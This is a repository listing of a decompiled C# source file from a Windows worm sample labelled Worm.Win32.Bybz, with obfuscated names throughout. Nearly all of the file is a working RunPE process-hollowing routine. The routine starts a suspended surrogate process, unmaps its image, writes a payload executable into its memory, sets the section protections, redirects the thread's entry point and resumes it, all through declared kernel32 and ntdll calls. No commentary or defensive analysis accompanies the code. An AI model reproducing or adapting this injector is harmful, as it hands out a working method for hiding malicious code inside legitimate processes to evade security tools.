MalwareSourceCode/MSIL/Worm/Win32/B/Worm.Win32.Bybz.dma-ede80954aa264e7f1fb365b2d83e8d211c6a79e95bdca110aeaef84c696635db/sadioasudoixzcuoisaudoixuzcoixuzcsad.cs

171 lines
6.2 KiB
C#
Raw Normal View History

2022-08-18 11:28:56 +00:00
// Decompiled with JetBrains decompiler
// Type: ajhfsdlhjasnagfgewfwsg.sadioasudoixzcuoisaudoixuzcoixuzcsad
// Assembly: Rokan, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 170F4640-026D-46A0-96EF-63F7CE568476
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Worm.Win32.Bybz.dma-ede80954aa264e7f1fb365b2d83e8d211c6a79e95bdca110aeaef84c696635db.exe
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Security;
using System.Text;
namespace ajhfsdlhjasnagfgewfwsg
{
public class sadioasudoixzcuoisaudoixuzcoixuzcsad
{
private static readonly int[] prot = new int[8]
{
1,
16,
2,
32,
4,
64,
4,
64
};
[DebuggerNonUserCode]
public sadioasudoixzcuoisaudoixuzcoixuzcsad()
{
}
public static void RunPE(byte[] bytes, string surrogateProcess)
{
int int32 = BitConverter.ToInt32(bytes, 60);
int int16 = (int) BitConverter.ToInt16(bytes, checked (int32 + 6));
IntPtr size1 = new IntPtr(BitConverter.ToInt32(bytes, checked (int32 + 84)));
byte[] sInfo = new byte[68];
IntPtr[] pInfo = new IntPtr[4];
IntPtr num1;
if (!sadioasudoixzcuoisaudoixuzcoixuzcsad.Win32.CreateProcess((string) null, new StringBuilder(surrogateProcess), num1, num1, false, 4, num1, (string) null, sInfo, pInfo))
return;
uint[] ctxt = new uint[179];
ctxt[0] = 65538U;
IntPtr bufr;
IntPtr numRead;
if (sadioasudoixzcuoisaudoixuzcoixuzcsad.Win32.GetThreadContext(pInfo[1], ctxt) && sadioasudoixzcuoisaudoixuzcoixuzcsad.Win32.ReadProcessMemory(pInfo[0], new IntPtr(checked ((long) ctxt[41] + 8L)), ref bufr, new IntPtr(4), ref numRead) && sadioasudoixzcuoisaudoixuzcoixuzcsad.Win32.NtUnmapViewOfSection(pInfo[0], bufr) == 0U)
{
IntPtr hProc1 = pInfo[0];
IntPtr num2 = new IntPtr(BitConverter.ToInt32(bytes, checked (int32 + 52)));
IntPtr addr1 = num2;
IntPtr num3 = new IntPtr(BitConverter.ToInt32(bytes, checked (int32 + 80)));
IntPtr size2 = num3;
IntPtr baseAddr1 = sadioasudoixzcuoisaudoixuzcoixuzcsad.Win32.VirtualAllocEx(hProc1, addr1, size2, 12288, 64);
bool flag = sadioasudoixzcuoisaudoixuzcoixuzcsad.Win32.WriteProcessMemory(pInfo[0], baseAddr1, bytes, size1, ref numRead);
int num4 = checked (int16 - 1);
int num5 = 0;
while (num5 <= num4)
{
int[] dst1 = new int[10];
Buffer.BlockCopy((Array) bytes, checked (int32 + 248 + num5 * 40), (Array) dst1, 0, 40);
byte[] dst2 = new byte[checked (dst1[4] - 1 + 1)];
Buffer.BlockCopy((Array) bytes, dst1[5], (Array) dst2, 0, dst2.Length);
IntPtr hProc2 = pInfo[0];
num3 = new IntPtr(checked (baseAddr1.ToInt32() + dst1[3]));
IntPtr baseAddr2 = num3;
byte[] buff = dst2;
num2 = new IntPtr(dst2.Length);
IntPtr size3 = num2;
ref IntPtr local1 = ref numRead;
flag = sadioasudoixzcuoisaudoixuzcoixuzcsad.Win32.WriteProcessMemory(hProc2, baseAddr2, buff, size3, ref local1);
IntPtr hProc3 = pInfo[0];
num3 = new IntPtr(checked (baseAddr1.ToInt32() + dst1[3]));
IntPtr addr2 = num3;
num2 = new IntPtr(dst1[2]);
IntPtr size4 = num2;
int newProt = sadioasudoixzcuoisaudoixuzcoixuzcsad.prot[dst1[9] >> 29 & 7];
int num6;
ref int local2 = ref num6;
flag = sadioasudoixzcuoisaudoixuzcoixuzcsad.Win32.VirtualProtectEx(hProc3, addr2, size4, newProt, ref local2);
checked { ++num5; }
}
IntPtr hProc4 = pInfo[0];
num3 = new IntPtr(checked ((long) ctxt[41] + 8L));
IntPtr baseAddr3 = num3;
byte[] bytes1 = BitConverter.GetBytes(baseAddr1.ToInt32());
num2 = new IntPtr(4);
IntPtr size5 = num2;
ref IntPtr local = ref numRead;
flag = sadioasudoixzcuoisaudoixuzcoixuzcsad.Win32.WriteProcessMemory(hProc4, baseAddr3, bytes1, size5, ref local);
ctxt[44] = checked ((uint) (baseAddr1.ToInt32() + BitConverter.ToInt32(bytes, int32 + 40)));
sadioasudoixzcuoisaudoixuzcoixuzcsad.Win32.SetThreadContext(pInfo[1], ctxt);
}
sadioasudoixzcuoisaudoixuzcoixuzcsad.Win32.ResumeThread(pInfo[1]);
}
[SuppressUnmanagedCodeSecurity]
private class Win32
{
[DebuggerNonUserCode]
public Win32()
{
}
[DllImport("kernel32")]
[return: MarshalAs(UnmanagedType.Bool)]
public static extern bool CreateProcess(
string appName,
StringBuilder commandLine,
IntPtr procAttr,
IntPtr thrAttr,
[MarshalAs(UnmanagedType.Bool)] bool inherit,
int creation,
IntPtr env,
string curDir,
byte[] sInfo,
IntPtr[] pInfo);
[DllImport("kernel32")]
[return: MarshalAs(UnmanagedType.Bool)]
public static extern bool GetThreadContext(IntPtr hThr, uint[] ctxt);
[DllImport("ntdll")]
public static extern uint NtUnmapViewOfSection(IntPtr hProc, IntPtr baseAddr);
[DllImport("kernel32")]
[return: MarshalAs(UnmanagedType.Bool)]
public static extern bool ReadProcessMemory(
IntPtr hProc,
IntPtr baseAddr,
ref IntPtr bufr,
IntPtr bufrSize,
ref IntPtr numRead);
[DllImport("kernel32")]
public static extern int ResumeThread(IntPtr hThr);
[DllImport("kernel32")]
[return: MarshalAs(UnmanagedType.Bool)]
public static extern bool SetThreadContext(IntPtr hThr, uint[] ctxt);
[DllImport("kernel32")]
public static extern IntPtr VirtualAllocEx(
IntPtr hProc,
IntPtr addr,
IntPtr size,
int allocType,
int prot);
[DllImport("kernel32")]
[return: MarshalAs(UnmanagedType.Bool)]
public static extern bool VirtualProtectEx(
IntPtr hProc,
IntPtr addr,
IntPtr size,
int newProt,
ref int oldProt);
[DllImport("kernel32")]
[return: MarshalAs(UnmanagedType.Bool)]
public static extern bool WriteProcessMemory(
IntPtr hProc,
IntPtr baseAddr,
byte[] buff,
IntPtr size,
ref IntPtr numRead);
}
}
}